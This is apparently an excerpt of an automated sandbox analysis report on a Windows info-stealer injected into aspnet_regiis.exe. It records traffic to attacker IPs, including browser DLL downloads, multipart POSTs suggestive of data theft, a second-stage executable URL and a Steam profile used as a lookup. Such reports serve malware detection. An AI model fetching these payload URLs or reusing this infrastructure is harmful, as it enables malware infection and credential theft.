                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 97509Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe0
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: file.exeString found in binary or memory: http://ocsp.comodoca.com0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
